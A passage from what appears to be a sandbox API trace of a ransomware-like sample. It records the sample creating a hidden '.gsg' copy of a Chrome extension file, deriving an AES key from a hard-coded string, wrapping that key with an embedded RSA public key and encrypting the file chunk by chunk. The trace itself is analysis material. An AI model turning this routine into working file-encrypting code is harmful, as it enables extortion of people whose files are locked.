lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.484] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.485] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.gsg", dwFileAttributes=0x2) returned 1 [0261.485] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.487] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.487] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.487] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.487] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7df40) returned 1 [0261.487] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.487] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.487] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e71838) returned 1 [0261.487] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71838, dwCertEncodingType=0x1, pInfo=0x2eab3a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab3d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab3d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7db80) returned 1 [0261.487] CryptEncrypt (in: hKey=0x2e7db80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.488] CryptEncrypt (in: hKey=0x2e7db80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72360*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e72360*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.488] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e72360*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e72360*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.488] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.495] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.495] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.497] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.497] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.497] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.497] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.498] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.499] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.500] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.501] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.501] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, 